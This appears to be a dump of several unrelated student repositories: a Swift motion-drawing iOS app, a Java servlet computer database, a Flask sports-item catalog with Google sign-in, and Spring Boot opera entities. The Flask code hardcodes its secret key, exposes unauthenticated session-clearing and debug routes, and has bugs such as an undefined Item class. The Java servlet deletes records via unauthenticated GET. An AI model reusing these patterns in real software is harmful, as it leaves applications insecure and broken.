import CoreMotion
class ViewController: UIViewController {
var motionManager: CMMotionManager?
var myQ: OperationQueue? = nil
var MGMT: CMMotionManager?
var touched = false
var timer = Timer()
var currentColor = UIColor.black
@IBOutlet weak var currentChosenColor: UILabel!
@IBAction func onRealRelease(_ sender: UIButton) {
touched = false
timer.invalidate()
if let manager = motionManager {
manager.stopDeviceMotionUpdates()
}
}
@IBAction func resetFunc(_ sender: UIButton) {
permView.image = nil
}
override func viewDidLoad() {
super.viewDidLoad()
motionManager = CMMotionManager()
if let manager = motionManager {
MGMT = manager
print("We have a motion manager")
if manager.isDeviceMotionAvailable {
print("We can detect device motion!")
myQ = OperationQueue()
manager.deviceMotionUpdateInterval = 0.02
} else {
let alert = UIAlertController(title: "Drawing", message: "Your device does not have the necessary sensors. You might want to try on another device.", preferredStyle: .alert)
present(alert, animated: true, completion: nil)
print("We can not detect device motion!")
}
} else {
print("We do not have a motion manager")
}
currentChosenColor.backgroundColor = currentColor
}
@IBAction func colorChange(_ sender: UIButton) {
currentColor = sender.backgroundColor!
currentChosenColor.backgroundColor = currentColor
}
@IBAction func onRelease(_ sender: UIButton) {
touched = true
MGMT!.startDeviceMotionUpdates(to: myQ!, withHandler: {
(data: CMDeviceMotion?, error: Error?) in
if let mydata = data {
print("My pitch ", mydata.attitude.pitch)
print("My roll ", mydata.attitude.roll)
let thisPitch = self.degrees(radians: mydata.attitude.pitch * 5) + 300
let thisRoll = self.degrees(radians: mydata.attitude.roll * 2.5) + 200
let currentPoint = CGPoint(x: thisRoll, y: thisPitch)
print(currentPoint)
self.lastPoint = currentPoint
DispatchQueue.main.async {
self.drawLines(fromPoint: currentPoint, toPoint: self.lastPoint)
}
}
if let myerror = error {
print("myError", myerror)
self.MGMT!.stopDeviceMotionUpdates()
}
})
}
func degrees(radians:Double) -> Double {
return (180/Double.pi) * radians
}
@IBOutlet weak var permView: UIImageView!
var lastPoint = CGPoint.zero
// var red: CGFloat = 0.0
// var green: CGFloat = 0.0
// var blue: CGFloat = 0.0
// var brushWidth: CGFloat = 10.0
// var opacity: CGFloat = 1.0
// var swiped = false
// let colors: [(CGFloat, CGFloat, CGFloat)] = [(0,0,0)]
// override func touchesBegan(_ touches: Set<UITouch>, with event: UIEvent?) {
// swiped = false
// if let touch = touches.first {
// lastPoint = touch.location(in: self.view)
// }
// }
@objc func drawLines(fromPoint: CGPoint, toPoint: CGPoint) {
UIGraphicsBeginImageContext(self.view.frame.size)
permView.image?.draw(in: CGRect(x: 0, y: 0, width: self.view.frame.width, height: self.view.frame.height))
let context = UIGraphicsGetCurrentContext()
context?.move(to: CGPoint(x: fromPoint.x, y: fromPoint.y))
context?.addLine(to: CGPoint(x: toPoint.x, y: toPoint.y))
print (fromPoint, " and ", toPoint)
context?.setBlendMode(CGBlendMode.normal)
context?.setLineCap(CGLineCap.round)
context?.setLineWidth(15)
context?.setStrokeColor(currentColor.cgColor)
context?.strokePath()
permView.image = UIGraphicsGetImageFromCurrentImageContext()
UIGraphicsEndImageContext()
}
// override func touchesMoved(_ touches: Set<UITouch>, with event: UIEvent?) {
// swiped = true
// if let touch = touches.first {
// let currentPoint = touch.location(in: self.view)
// drawLines(fromPoint: lastPoint, toPoint: currentPoint)
//
// lastPoint = currentPoint
// }
// }
//
// override func touchesEnded(_ touches: Set<UITouch>, with event: UIEvent?) {
// if !swiped {
// drawLines(fromPoint: lastPoint, toPoint: lastPoint)
// }
// }
// let interval = 0.5
// func isDevicesAvailable() -> Bool {
// if !motionManager.isDeviceMotionAvailable {
// let alert = UIAlertController(title: "Drawing", message: "Your device does not have the necessary sensors. You might wat to try on another device.", preferredStyle: .alert)
// present(alert, animated: true, completion: nil)
// print("Devices not detected")
// }
// return motionManager.isDeviceMotionAvailable
// }
// func myDeviceMotion() {
// motionManager.startDeviceMotionUpdates(to: <#T##OperationQueue#>, withHandler: <#T##CMDeviceMotionHandler##CMDeviceMotionHandler##(CMDeviceMotion?, Error?) -> Void#>)
// }
//
// override func viewDidAppear(_ animated: Bool) {
// super.viewDidAppear(animated)
// if isDevicesAvailable() {
// print("Core Motion Launched")
// }
// }
override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning()
// Dispose of any resources that can be recreated.
}
}
| 299451cb33d6209edccfe5781781474304a0755e | [
"Swift"
] | 1 | Swift | Lharagon/drawingHood | 6ab2cf7b4bb55509ad00c8f15e8d42946bcddbd8 | 2e31b268593b995c63ed5a909412833443cc6bfa |
refs/heads/master | <file_sep>package com.excilys.project.computerDatabase.service;
import java.util.List;
import com.excilys.project.computerDatabase.domain.Company;
import com.excilys.project.computerDatabase.domain.Computer;
import com.excilys.project.computerDatabase.persistance.CompanyDAO;
import com.excilys.project.computerDatabase.persistance.ComputerDAO;
import com.excilys.project.computerDatabase.persistance.ComputerListWrapper;
import com.excilys.project.computerDatabase.persistance.ConnectionManager;
public class ComputerServices {
private static ComputerDAO computerDAO;
private static CompanyDAO companyDAO;
private static ComputerServices service;
private String actionMessage;
private final String errorMessage = " failed : Other Exception";
private final String successMessage = " succeeded";
private ComputerServices(){
computerDAO = ComputerDAO.getInstance();
companyDAO = CompanyDAO.getInstance();
}
public static ComputerServices getInstance(){
if(service == null) {
service = new ComputerServices();
}
return service;
}
public List<Company> listCompanies(){
actionMessage = "Listing companies";
List<Company> list = null;
try{
ConnectionManager.INSTANCE.startTransaction();
list = companyDAO.listCompanies();
ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
}catch(Exception ex){
ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
}finally{
ConnectionManager.INSTANCE.closeConnection();
}
return list;
}
public int totalCount(ComputerListWrapper wrapper){
actionMessage = "Counting";
int total = 0;
try{
ConnectionManager.INSTANCE.startTransaction();
total = computerDAO.totalCount(wrapper);
ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
}catch(Exception ex){
ex.printStackTrace();
ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
}finally{
ConnectionManager.INSTANCE.closeConnection();
}
return total;
}
public List<Computer> getComputerList(ComputerListWrapper wrapper) {
actionMessage = "Listing computers";
List<Computer> list = null;
try{
list = computerDAO.getList(wrapper);
}catch(Exception ex){
ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
}finally{
ConnectionManager.INSTANCE.closeConnection();
}
return list;
}
public void addComputer(Computer computer) {
actionMessage = "Adding " + computer.getName();
try{
ConnectionManager.INSTANCE.startTransaction();
int id = computerDAO.addComputer(computer);
actionMessage += " at id " + id;
ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
}catch(Exception ex){
ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
}finally{
ConnectionManager.INSTANCE.closeConnection();
}
}
public void updateComputer(Computer computer) {
actionMessage = "Adding " + computer.getName() + " at id " + computer.getId();
try{
ConnectionManager.INSTANCE.startTransaction();
computerDAO.updateComputer(computer);
ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
}catch(Exception ex){
ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
}finally{
ConnectionManager.INSTANCE.closeConnection();
}
}
public void deleteComputer(String id) {
actionMessage = "Deleting computer at id " + id;
try{
ConnectionManager.INSTANCE.startTransaction();
computerDAO.deleteComputer(id);
ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
}catch(Exception ex){
ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
}finally{
ConnectionManager.INSTANCE.closeConnection();
}
}
public Computer getComputer(String id) {
actionMessage = "Fetching computer at id " + id;
Computer c = null;
try{
c = computerDAO.getComputer(id);
}catch(Exception ex){
ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
}finally{
ConnectionManager.INSTANCE.closeConnection();
}
return c;
}
}
<file_sep>package com.excilys.project.computerDatabase.controller;
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import com.excilys.project.computerDatabase.service.ComputerServices;
/**
* Servlet implementation class DeleteComputer
*/
@WebServlet("/DeleteComputer")
public class DeleteComputer extends HttpServlet {
private static final long serialVersionUID = 1L;
/**
* @see HttpServlet#HttpServlet()
*/
public DeleteComputer() {
super();
// TODO Auto-generated constructor stub
}
/**
* @see HttpServlet#doGet(HttpServletRequest request, HttpServletResponse response)
*/
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
// TODO Auto-generated method stub
ComputerServices service = ComputerServices.getInstance();
service.deleteComputer(request.getParameter("id"));
request.getRequestDispatcher("Dashboard").forward(request, response);
}
}
<file_sep>package com.excilys.project.computerDatabase.persistance;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import com.excilys.project.computerDatabase.domain.Company;
import com.excilys.project.computerDatabase.domain.Log;
public class LogDAO {
private static LogDAO dao;
private LogDAO(){}
public static LogDAO getInstance(){
if(dao == null) {
dao = new LogDAO();
}
return dao;
}
private void closeConnections(ResultSet rs, Statement stmt){
try {
if (rs != null) rs.close();
if (stmt != null) stmt.close();
} catch (SQLException e) {}
}
public List<Log> listLogs(Connection cn) {
ResultSet rs = null ;
Statement stmt = null;
List<Log> liste = new ArrayList<Log>();
try {
stmt = cn.createStatement();
rs = stmt.executeQuery("SELECT id, class, logDate, action, logType FROM company");
while (rs.next()) {
Log l = Log.builder()
.id(rs.getLong(1))
.className(rs.getString(2))
.logDate(rs.getDate(3))
.action(rs.getString(4))
.logType(rs.getString(5))
.build();
liste.add(l);
}
} catch (Exception e) {
e.printStackTrace();
} finally {
closeConnections(rs, stmt);
}
return liste;
}
public void addLog(Connection cn, Log log) {
ResultSet rs = null ;
PreparedStatement stmt = null;
try {
stmt = cn.prepareStatement("INSERT INTO log "
+ "(id, class, logDate, action, logType) VALUES(0,?,now(),?,?);");
stmt.setString(1,log.getClassName());
stmt.setString(2, log.getAction());
stmt.setString(3, log.getLogType());
stmt.execute();
} catch (Exception e) {
e.printStackTrace();
} finally {
closeConnections(rs,stmt);
}
}
}
<file_sep>drop table if exists log;
create table log (
id bigint not null auto_increment,
class varchar(255),
logDate timestamp,
action varchar(255),
logType varchar(10),
constraint pk_log primary key (id))
; | 52e2dee57003a0a14b94947a863f2b8db3fd5047 | [
"Java",
"SQL"
] | 4 | Java | Aetumn/TrainingProject | 7b84ec75ddd2b2b0e7294a006b47eeb50392bf46 | ec36ff283eee75279bca5ec7eb6adb67388bf364 |
refs/heads/master | <file_sep>from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Category, Base, CatItem, User
engine = create_engine('sqlite:///catalog_database.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Categories + User
user1 = User(name='<NAME>', email='<EMAIL>',
picture='https://lh6.googleusercontent.com/-sVcI-LPVb-0/AAAAAAAAAAI/AAAAAAAAAAc/JfhLrXf4Po4/s96-c/photo.jpg')
session.add(user1)
session.commit()
category1 = Category(name='Football', user=user1)
session.add(category1)
session.commit()
catItem1 = CatItem(name="Ball", description="Beautiful Champions League ball",
category=category1, user=user1)
session.add(catItem1)
session.commit()
catItem2 = CatItem(name="Shirt", description="Ajax Number 13 Shirt",
category=category1, user=user1)
session.add(catItem2)
session.commit()
catItem3 = CatItem(name="Shoes", description="Nike Football Shoes",
category=category1, user=user1)
session.add(catItem3)
session.commit()
category2 = Category(name='Basketball', user=user1)
session.add(category2)
session.commit()
catItem1 = CatItem(name="Jersey",
description="A original Chicago Bulls jersey",
category=category2, user=user1)
session.add(catItem1)
session.commit()
catItem2 = CatItem(name="Shoes", description="Adidas Basketball Shoes",
category=category2, user=user1)
session.add(catItem2)
session.commit()
catItem3 = CatItem(name="Shorts", description="Chicago Bulls Original Shorts",
category=category2, user=user1)
session.add(catItem3)
session.commit()
category3 = Category(name='Snowboarding', user=user1)
session.add(category1)
session.commit()
catItem1 = CatItem(name="Goggles", description="Stylish non-fog goggles",
category=category3, user=user1)
session.add(catItem1)
session.commit()
catItem2 = CatItem(name="Snowboard",
description="Snowboard with custom design",
category=category3, user=user1)
session.add(catItem2)
session.commit(),
catItem3 = CatItem(name="Socks",
description="Quality socks to keep the cold away",
category=category3, user=user1)
session.add(catItem3)
session.commit()
print "Datbase has been filled!"
<file_sep>Flask==1.0.2
httplib2==0.11.3
oauth2client==4.1.3
psycopg2==2.7.5
SQLAlchemy==1.2.13<file_sep>{% extends "layout.html" %}
{% block title %}View Items{% endblock %}
{% block content %}
<div class="container sections">
<h2>{{ category.name }} ({{ total }}{% if total == 1 %} item{% else %} items{% endif %})</h2>
{% if session['user_id'] == category.user_id %}
<div class="row">
<div class="col-md-12">
<button class="btn btn-link"><a href="{{ url_for('edit_category', category_id=category.id) }}">Edit</button></a>
<a href="{{ url_for('add_item_by_category', category_id=category.id) }}"><button class="btn btn-link" style="color:green">Add item </button></a>
<a href="{{ url_for('delete_category', category_id=category.id) }}"><button class="btn btn-link" style="color:red">Delete</button></a>
{% endif %}
{% if total == 0 %}
<p>No items are present in this category.</p>
{% else %}
<table class="table table-hover">
<tbody>
{% for item in items %}
<tr>
<td><a href="{{ url_for('view_item', item_id=item.id) }}"><p>{{ item.name }}</p></a></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
{% endblock %}<file_sep>#!/usr/bin/env python
from flask import Flask, render_template, request, redirect, jsonify
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from database_setup import Base, User, Category, CatItem
from flask import session as login_session
import random
import string
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
from flask import make_response, flash, url_for
import requests
app = Flask(__name__)
# Load the Google Sign-in API Client ID.
CLIENT_ID = json.loads(
open('client_secrets.json', 'r').read())['web']['client_id']
# Connect to the database and create a database session.
engine = create_engine('sqlite:///catalog_database.db',
connect_args={'check_same_thread': False})
# Bind the above engine to a session.
Session = sessionmaker(bind=engine)
# Create a Session object.
session = Session()
@app.route('/show')
def show():
print(login_session)
# Redirect to login page.
@app.route('/')
@app.route('/catalog/')
@app.route('/catalog/items/')
def home():
categories = session.query(Category).all()
catitems = session.query(CatItem).all()
# flash(login_session['username'])
return render_template(
'index.html', categories=categories, catitems=catitems)
# Create anti-forgery state token
@app.route('/login/')
def login():
state = ''.join(
random.choice(string.ascii_uppercase + string.digits)
for x in range(32))
login_session['state'] = state
return render_template('login.html', STATE=state)
# Connect to the Google Sign-in oAuth method.
@app.route('/gconnect', methods=['POST'])
def gconnect():
#Validate state token
if request.args.get('state') != login_session['state']:
response = make_response(json.dumps('Invalid state parameter.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Obtain authorization code
code = request.data.decode('utf-8')
try:
# Upgrade the authorization code into a credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Check that the access token is valid.
access_token = credentials.access_token
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'
% access_token)
# Submit request, parse response - Python3 compatible
h = httplib2.Http()
response = h.request(url, 'GET')[1]
str_response = response.decode('utf-8')
result = json.loads(str_response)
# If there was an error in the access token info, abort.
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is used for the intended user.
gplus_id = credentials.id_token['sub']
if result['user_id'] != gplus_id:
response = make_response(
json.dumps("Token's user ID doesn't match given user ID."), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is valid for this app.
if result['issued_to'] != CLIENT_ID:
response = make_response(
json.dumps("Token's client ID does not match app's."), 401)
response.headers['Content-Type'] = 'application/json'
return response
stored_access_token = login_session.get('access_token')
stored_gplus_id = login_session.get('gplus_id')
if stored_access_token is not None and gplus_id == stored_gplus_id:
response = make_response(
json.dumps('Current user is already connected.'), 200)
response.headers['Content-Type'] = ' '
return response
# Store the access token in the session for later use.
login_session['access_token'] = credentials.access_token
login_session['gplus_id'] = gplus_id
# Get user info
userinfo_url = "https://www.googleapis.com/oauth2/v1/userinfo"
params = {'access_token': credentials.access_token, 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = answer.json()
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
login_session['provider'] = 'google'
# see if user exists, if it doesn't make a new one
user_id = getUserID(login_session['email'])
if not user_id:
user_id = createUser(login_session)
login_session['user_id'] = user_id
output = ''
output += '<h1>Welcome, '
output += login_session['username']
output += '!</h1>'
output += '<img src="'
output += login_session['picture']
flash("Welcome! %s" % login_session['username'])
return output
# Disconnect Google Account.
def gdisconnect():
"""Disconnect the Google account of the current logged-in user."""
# Only disconnect the connected user.
access_token = login_session.get('access_token')
if access_token is None:
response = make_response(
json.dumps('Current user not connected.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token
h = httplib2.Http()
result = h.request(url, 'GET')[0]
if result['status'] == '200':
response = make_response(json.dumps('Successfully disconnected.'), 200)
response.headers['Content-Type'] = 'application/json'
return response
else:
response = make_response(
json.dumps('Failed to revoke token for given user.'), 400)
response.headers['Content-Type'] = 'application/json'
return response
def createUser(login_session):
DBSession = sessionmaker(bind=engine)
session = DBSession()
newUser = User(name=login_session['username'], email=login_session[
'email'], picture=login_session['picture'])
session.add(newUser)
session.commit()
user = session.query(User).filter_by(email=login_session['email']).one()
return user.id
def getUserInfo(user_id):
DBSession = sessionmaker(bind=engine)
session = DBSession()
user = session.query(User).filter_by(id=user_id).one()
return user
def getUserID(email):
DBSession = sessionmaker(bind=engine)
session = DBSession()
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except:
return None
# DISCONNECT - Revoke a current user's token and reset their login_session
@app.route('/gdisconnect')
def gdisconnect():
# Only disconnect a connected user
access_token = login_session.get('access_token')
if access_token is None:
response = make_response(
json.dumps('Current user not connected.'), 401)
response.headers['Content-type'] = 'application/json'
return response
revoke = requests.post('https://accounts.google.com/o/oauth2/revoke',
params={'token': access_token},
headers={'content-type':
'application/x-www-form-urlencoded'})
result = getattr(revoke, 'status_code')
status_code = getattr(revoke, 'status_code')
if status_code == 200:
del login_session['access_token']
del login_session['gplus_id']
del login_session['username']
del login_session['email']
del login_session['picture']
response = make_response(json.dumps('Disconnected.'), 200)
redirect('/')
flash("You have successfully logged out")
return redirect('/')
else:
# For whatever reason, the given token was invalid.
response = make_response(
json.dumps('Failed to revoke token for given user.', 400))
response.headers['Content-Type'] = 'application/json'
return response
# Use to completely clear your login session if logging out does not work
@app.route('/clearSession')
def clear_session():
login_session.clear()
return "session deleted"
# Log out the currently connected user.
@app.route('/logout')
def logout():
"""Log out the currently connected user."""
if 'username' in login_session:
gdisconnect()
del login_session['google_id']
del login_session['access_token']
del login_session['username']
del login_session['email']
del login_session['picture']
del login_session['user_id']
flash("You have been logged out!")
return redirect(url_for('home'))
else:
flash("You were not logged in!")
return redirect(url_for('home'))
# Create new user.
def create_user(login_session):
"""Crate a new user.
Argument:
login_session (dict): The login session.
"""
new_user = User(
name=login_session['username'],
email=login_session['email'],
picture=login_session['picture']
)
session.add(new_user)
session.commit()
user = session.query(User).filter_by(email=login_session['email']).one()
return user.id
def get_user_info(user_id):
user = session.query(User).filter_by(id=user_id).one()
return user
def get_user_id(email):
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except:
return None
@app.route("/show")
def Show():
for data in login_session:
print(data)
# Add a new category.
@app.route("/catalog/category/new/", methods=['GET', 'POST'])
def add_category():
if 'username' not in login_session:
flash("Please log in to continue.")
return redirect(url_for('login'))
elif request.method == 'POST':
if request.form['new-category-name'] == '':
flash('The field cannot be empty.')
return redirect(url_for('home'))
category = session.query(Category).\
filter_by(name=request.form['new-category-name']).first()
if category is not None:
flash('The entered category already exists.')
return redirect(url_for('add_category'))
new_category = Category(
name=request.form['new-category-name'],
user_id=login_session['user_id'])
session.add(new_category)
session.commit()
flash('New category %s successfully created!' % new_category.name)
return redirect(url_for('home'))
else:
return render_template('newcategory.html')
# Create a new item.
@app.route("/catalog/item/new/", methods=['GET', 'POST'])
def add_item():
if 'username' not in login_session:
flash("Please log in to continue.")
return redirect(url_for('login'))
elif request.method == 'POST':
# Check if the item already exists in the database.
# If it does, display an error.
item = session.query(Item).filter_by(name=request.form['name']).first()
if item:
if item.name == request.form['name']:
flash('The item already exists')
return redirect(url_for("add_item"))
new_item = Item(
name=request.form['name'],
category_id=request.form['category'],
description=request.form['description'],
user_id=login_session['user_id']
)
session.add(new_item)
session.commit()
flash('New item successfully created!')
return redirect(url_for('home'))
else:
items = session.query(CatItem).\
filter_by(user_id=login_session['user_id']).all()
categories = session.query(Category).\
filter_by(user_id=login_session['user_id']).all()
return render_template(
'newitem.html',
items=items,
categories=categories
)
# Create new item by Category ID.
@app.route("/catalog/category/<int:category_id>/item/new/",
methods=['GET', 'POST'])
def add_item_by_category(category_id):
if 'username' not in login_session:
flash("You were not authorised to access that page.")
return redirect(url_for('login'))
elif request.method == 'POST':
# Check if the item already exists in the database.
# If it does, display an error.
item = session.query(CatItem).filter_by(
name=request.form['name']).first()
if item:
if item.name == request.form['name']:
flash('The item already exists')
return redirect(url_for("add_item"))
new_item = CatItem(
name=request.form['name'],
category_id=category_id,
description=request.form['description'],
user_id=login_session['user_id'])
session.add(new_item)
session.commit()
flash('New item created!')
return redirect(url_for('show_items_in_category',
category_id=category_id))
else:
category = session.query(Category).filter_by(id=category_id).first()
return render_template('neweritem.html', category=category)
# Check if the item exists in the database,
def exists_item(item_id):
item = session.query(CatItem).filter_by(id=item_id).first()
if item is not None:
return True
else:
return False
# Check if the category exists in the database.
def exists_category(category_id):
category = session.query(Category).filter_by(id=category_id).first()
if category is not None:
return True
else:
return False
# View an item by its ID.
@app.route('/catalog/item/<int:item_id>/')
def view_item(item_id):
if exists_item(item_id):
item = session.query(CatItem).filter_by(id=item_id).first()
category = session.query(Category)\
.filter_by(id=item.category_id).first()
owner = session.query(User).filter_by(id=item.user_id).first()
return render_template(
"viewitem.html",
item=item,
category=category,
owner=owner
)
else:
flash('We are unable to process your request.')
return redirect(url_for('home'))
# Edit existing item.
@app.route("/catalog/item/<int:item_id>/edit/", methods=['GET', 'POST'])
def edit_item(item_id):
if 'username' not in login_session:
flash("Please log in.")
return redirect(url_for('login'))
if not exists_item(item_id):
flash("We are unable to process your request.")
return redirect(url_for('home'))
item = session.query(CatItem).filter_by(id=item_id).first()
if login_session['user_id'] != item.user_id:
flash("You are not authorised to access that page.")
return redirect(url_for('home'))
if request.method == 'POST':
if request.form['name']:
item.name = request.form['name']
if request.form['description']:
item.description = request.form['description']
if request.form['category']:
item.category_id = request.form['category']
session.add(item)
session.commit()
flash('Item successfully updated!')
return redirect(url_for('edit_item', item_id=item_id))
else:
categories = session.query(Category).\
filter_by(user_id=login_session['user_id']).all()
return render_template(
'updateitem.html',
item=item,
categories=categories
)
# Delete existing item.
@app.route("/catalog/item/<int:item_id>/delete/", methods=['GET', 'POST'])
def delete_item(item_id):
if 'username' not in login_session:
flash("Please log in to continue.")
return redirect(url_for('login'))
if not exists_item(item_id):
flash("We are unable to process your request right now.")
return redirect(url_for('home'))
item = session.query(CatItem).filter_by(id=item_id).first()
if login_session['user_id'] != item.user_id:
flash("You were not authorised to access that page.")
return redirect(url_for('home'))
if request.method == 'POST':
session.delete(item)
session.commit()
flash("Item successfully deleted!")
return redirect(url_for('home'))
else:
return render_template('delete.html', item=item)
# Show items in a particular category.
@app.route('/catalog/category/<int:category_id>/items/')
def show_items_in_category(category_id):
if not exists_category(category_id):
flash("We are unable to process your request right now.")
return redirect(url_for('home'))
category = session.query(Category).filter_by(id=category_id).first()
items = session.query(CatItem).filter_by(category_id=category.id).all()
total = session.query(CatItem).filter_by(category_id=category.id).count()
return render_template(
'items.html',
category=category,
items=items,
total=total)
# Edit a category.
@app.route('/catalog/category/<int:category_id>/edit/',
methods=['GET', 'POST'])
def edit_category(category_id):
category = session.query(Category).filter_by(id=category_id).first()
if 'username' not in login_session:
flash("Please log in to continue.")
return redirect(url_for('login'))
if not exists_category(category_id):
flash("We are unable to process your request right now.")
return redirect(url_for('home'))
# If the logged in user does not have authorisation to
# edit the category, redirect to homepage.
if login_session['user_id'] != category.user_id:
flash("We are unable to process your request right now.")
return redirect(url_for('home'))
if request.method == 'POST':
if request.form['name']:
category.name = request.form['name']
session.add(category)
session.commit()
flash('Category successfully updated!')
return redirect(url_for('show_items_in_category',
category_id=category.id))
else:
return render_template('editcategory.html.html', category=category)
# Delete a category.
@app.route('/catalog/category/<int:category_id>/delete/',
methods=['GET', 'POST'])
def delete_category(category_id):
category = session.query(Category).filter_by(id=category_id).first()
if 'username' not in login_session:
flash("Please log in to continue.")
return redirect(url_for('login'))
if not exists_category(category_id):
flash("We are unable to process your request right now.")
return redirect(url_for('home'))
# If the logged in user does not have authorisation to
# edit the category, redirect to homepage.
if login_session['user_id'] != category.user_id:
flash("We are unable to process your request right now.")
return redirect(url_for('home'))
if request.method == 'POST':
session.delete(category)
session.commit()
flash("Category successfully deleted!")
return redirect(url_for('home'))
else:
return render_template("deletecategory.html", category=category)
# JSON Endpoints
# Return JSON of all the items in the catalog.
@app.route('/api/v1/catalog.json')
def show_catalog_json():
items = session.query(CatItem).order_by(CatItem.id.desc())
return jsonify(catalog=[i.serialize for i in items])
# Return JSON of a particular item in the catalog.
@app.route(
'/api/v2/categories/<int:category_id>/item/<int:item_id>/JSON')
def catalog_item_json(category_id, item_id):
if exists_category(category_id) and exists_item(item_id):
item = session.query(CatItem)\
.filter_by(id=item_id, category_id=category_id).first()
if item is not None:
return jsonify(item=item.serialize)
else:
return jsonify(
error='item {} does not belong to category {}.'
.format(item_id, category_id))
else:
return jsonify(error='The item or the category does not exist.')
# Return JSON of all the categories in the catalog.
@app.route('/api/v2/categories/JSON')
def categories_json():
categories = session.query(Category).all()
return jsonify(categories=[i.serialize for i in categories])
if __name__ == "__main__":
app.secret_key = "Testkey" # os.urandom(24)
app.run(host="0.0.0.0", port=5000, debug=False)
<file_sep># Item Catalog Project
> Created By <NAME>
## About
This is a website where sport items are listed in a catalog. You can log in with a google acount and add items and edit/delete items that belong to you.
## To Run
### You will need:
- [Python2](https://www.python.org/)
- [Vagrant](https://www.vagrantup.com/)
- [VirtualBox](https://www.virtualbox.org/) or a Linux-based virtual machine
- [Flask](http://flask.pocoo.org/)
#### and dependencies:
- oauth2client
- SQLAlchemy
- PostgreSQL
- httlib2
### Getting Ready
1. Install Vagrant And VirtualBox
2. Clone this repository
3. Navigate to the Vagrant folder and continue to the catalog folder
4. Start your virtual machine by typing `vagrant up` and then `vagrant ssh` to log in to the machine.
### Running the program
5. type `cd /vagrant` to navigate to shared folders
6. to get all the dependencies run `pip install -r requirements.txt`
(if you get a `ERROR: Could not install packages` error, use the sudo command like this `sudo pip install -r requirements.txt`)
7. then navigate to catalog project by typing `cd catalog`
8. run the database setup by running the command `python database_setup`
9. then run `python injector.py` to populate the database
10. then type `python application.py` to run the application.
| ac0396b0377e08bd7449fc7dc38b32415a567eaf | [
"Markdown",
"Python",
"Text",
"HTML"
] | 5 | Python | Rashiid-Dev/Item-Catalog | 6a08172ca475bdd199e65ecb0c4a52a97e62f4aa | fee67fb58206dce10148daae2ea085b4e1ea2e4e |
refs/heads/master | <repo_name>chengjhan/SpringBootDemo<file_sep>/OperaWeb/src/main/java/com/operaweb/model/entity/Opera.java
package com.operaweb.model.entity;
import java.util.List;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.FetchType;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.OneToMany;
import javax.persistence.OrderBy;
import javax.persistence.Table;
@Entity
@Table(name = "Operas")
public class Opera {
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
@Column(name = "operaid")
private Integer operaId;
@Column(name = "title")
private String title;
@Column(name = "year")
private Integer year;
@Column(name = "composer")
private String composer;
@OneToMany(cascade = CascadeType.ALL, fetch = FetchType.LAZY, mappedBy = "opera")
@OrderBy(value = "commentId ASC")
private List<Comment> comments;
public Integer getOperaId() {
return operaId;
}
public void setOperaId(Integer operaId) {
this.operaId = operaId;
}
public String getTitle() {
return title;
}
public void setTitle(String title) {
this.title = title;
}
public Integer getYear() {
return year;
}
public void setYear(Integer year) {
this.year = year;
}
public String getComposer() {
return composer;
}
public void setComposer(String composer) {
this.composer = composer;
}
public List<Comment> getComments() {
return comments;
}
public void setComments(List<Comment> comments) {
this.comments = comments;
}
}
<file_sep>/OperaWeb/src/main/java/com/operaweb/model/repository/OperaRepositoryCustom.java
package com.operaweb.model.repository;
import java.util.List;
import com.operaweb.model.entity.Opera;
public interface OperaRepositoryCustom {
List<Opera> findByTitleContainingOrderByTitleOrYear(String q, String s);
List<Opera> findByTitleContainingOrderByTitleOrYearPaging(String q, String s, int pageNumber, int pageSize);
long countByTitleContaining(String q);
}
<file_sep>/OperaWeb/src/main/java/com/operaweb/model/viewmodel/Pagination.java
package com.operaweb.model.viewmodel;
import java.util.List;
public class Pagination<T> {
private List<T> list;
private long count;
private int pageNumber;
private int pageSize;
public int getPageCount() {
return (int) Math.ceil(count / (double) pageSize);
}
public boolean hasPrevious() {
return pageNumber > 1;
}
public boolean hasNext() {
return pageNumber < getPageCount();
}
public List<T> getList() {
return list;
}
public void setList(List<T> list) {
this.list = list;
}
